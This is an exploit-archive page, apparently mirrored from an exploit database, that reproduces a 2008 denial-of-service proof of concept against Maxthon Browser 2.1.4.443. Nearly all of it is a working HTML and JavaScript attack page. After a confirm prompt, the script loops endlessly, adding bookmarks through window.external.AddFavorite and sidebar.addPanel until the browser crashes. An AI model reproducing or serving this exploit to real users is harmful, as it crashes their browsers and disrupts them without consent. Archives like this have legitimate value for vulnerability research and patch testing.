[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
# Published : 2008-09-11
# Author : LiquidWorm
# Previous Title : Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
# Next Title : Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC
<!--
Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC
Summary: Maxthon Browser is a powerful tabbed browser built for
all users. Besides basic browsing functionality, Maxthon Browser
provides a rich set of features to improve your surfing experience.
Product web page: http://www.maxthon.com
by Gjoko 'LiquidWorm' Krstic
liquidworm [t00t] gmail [d0t] com
http://www.zeroscience.org
09.09.2008
-->
<html>
<title>Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC</Title>
<head>
<body>
<script type="text/javascript">
alert("Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoCnnttby LiquidWorm");
function thricer()
{
title="Attack";
url="http://www.thrice.net/";
if (window.sidebar)
{
window.sidebar.addPanel(title, url,"");
}
else if( window.external )
{
window.external.AddFavorite( url, title);
}
else if(window.opera && window.print)
{
return (true);
}
}
var answ = confirm("Press OK to start exploitationnPress Cancel to skip exploitation");
if (answ == true)
{
for (x=0; x<x+1; x++)
thricer();
}
else
{
alert("Allrighty Then!");
window.location.href = "http://www.disneyland.com";
}
</script>
</body>
</head>
</html>
# www.Syue.com [2008-09-11]